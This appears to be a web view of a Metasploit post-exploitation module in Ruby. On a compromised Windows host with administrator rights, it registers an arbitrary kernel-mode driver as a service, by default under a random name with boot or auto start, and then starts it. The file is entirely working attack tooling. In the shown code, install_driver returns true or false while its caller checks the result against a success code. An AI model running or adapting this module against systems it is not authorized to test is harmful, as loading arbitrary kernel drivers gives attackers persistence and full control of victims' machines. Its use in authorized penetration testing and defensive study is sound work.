CoCalc -- driver

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/manage/driver_loader.rb
¹⁹⁷²¹ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Windows::Priv
9
  include Msf::Post::Windows::Services
10
  include Msf::Post::Windows::Error
11

12
  START_TYPE = {
13
    'demand' => 'SERVICE_DEMAND_START',
14
    'boot' => 'SERVICE_BOOT_START',
15
    'auto' => 'SERVICE_AUTO_START',
16
    'disabled' => 'SERVICE_DISABLED',
17
    'system' => 'SERVICE_SYSTEM_START'
18
  }
19

20
  ERROR_TYPE = {
21
    'critical' => 'SERVICE_ERROR_CRITICAL',
22
    'normal' => 'SERVICE_ERROR_NORMAL',
23
    'severe' => 'SERVICE_ERROR_SEVERE',
24
    'ignore' => 'SERVICE_ERROR_IGNORE'
25
  }
26

27
  SERVICE_TYPE = {
28
    'kernel' => 'SERVICE_KERNEL_DRIVER',
29
    'file_system' => 'SERVICE_FILE_SYSTEM_DRIVER',
30
    'adapter' => 'SERVICE_ADAPTER',
31
    'recognizer' => 'SERVICE_RECOGNIZER_DRIVER'
32
  }
33

34
  def initialize(info = {})
35
    super(
36
      update_info(
37
        info,
38
        'Name' => 'Windows Manage Driver Loader',
39
        'Description' => %q{
40
          This module loads a KMD (Kernel Mode Driver) using the Windows Service API.
41
        },
42
        'License' => MSF_LICENSE,
43
        'Author' => 'Borja Merino <bmerinofe[at]gmail.com>',
44
        'Platform' => 'win',
45
        'SessionTypes' => [ 'meterpreter' ],
46
        'Notes' => {
47
          'Stability' => [CRASH_OS_DOWN],
48
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
49
          'Reliability' => []
50
        }
51
      )
52
    )
53

54
    register_options(
55
      [
56
        OptString.new('DRIVER_PATH', [true, 'Driver path in %SYSTEMROOT%. Example: c:\\windows\\system32\\msf.sys']),
57
        OptString.new('DRIVER_NAME', [false, 'Driver Name.']),
58
        OptEnum.new('START_TYPE', [true, 'Start type.', 'auto', [ 'boot', 'system', 'auto', 'demand', 'disabled']]),
59
        OptEnum.new('SERVICE_TYPE', [true, 'Service type.', 'kernel', [ 'kernel', 'file_system', 'adapter', 'recognizer']]),
60
        OptEnum.new('ERROR_TYPE', [true, 'Error type.', 'ignore', [ 'ignore', 'normal', 'severe', 'critical']])
61
      ]
62
    )
63
  end
64

65
  def run
66
    driver = datastore['DRIVER_PATH']
67
    start = START_TYPE[datastore['START_TYPE']]
68
    error = ERROR_TYPE[datastore['ERROR_TYPE']]
69
    service = SERVICE_TYPE[datastore['SERVICE_TYPE']]
70

71
    name = datastore['DRIVER_NAME'].blank? ? Rex::Text.rand_text_alpha(6..13) : datastore['DRIVER_NAME']
72

73
    unless is_admin?
74
      print_error("Administrator or better privileges needed. Try 'getsystem' first.")
75
      return
76
    end
77

78
    unless driver =~ Regexp.new(Regexp.escape(expand_path('%SYSTEMROOT%')), Regexp::IGNORECASE)
79
      print_error('The driver must be inside %SYSTEMROOT%.')
80
      return
81
    end
82

83
    unless file_exist?(driver)
84
      print_error("Driver #{driver} does not exist.")
85
      return
86
    end
87

88
    inst = install_driver(name, path: driver, starttype: start, error_control: error, service_type: service)
89

90
    if inst == Windows::Error::SUCCESS
91
      ss = service_start(name)
92
      case ss
93
      when Windows::Error::SUCCESS
94
        print_good('Driver loaded successfully.')
95
      when Windows::Error::SERVICE_ALREADY_RUNNING
96
        print_error('Service already started.')
97
      when Windows::Error::SERVICE_DISABLED
98
        print_error('Service disabled.')
99
      else
100
        print_error('There was an error starting the service.')
101
      end
102
    end
103
  end
104

105
  def install_driver(name, opts = {})
106
    rc = service_create(name, opts)
107

108
    if rc == Windows::Error::SUCCESS
109
      print_status("Service object \"#{name}\" added to the Service Control Manager database.")
110
      return true
111
    end
112

113
    if rc == Windows::Error::SERVICE_EXISTS
114
      print_error('The specified service already exists.')
115
      # Show ImagePath just to know if the service corresponds to the desired driver.
116
      service = service_info(name)
117
      print_error("Path of driver file in \"#{name}\" service: #{service[:path]}.")
118
    else
119
      print_error("There was an error opening the driver handler. GetLastError=#{rc}.")
120
    end
121

122
    return false
123
  end
124
end
125

126
Product

Resources

Company
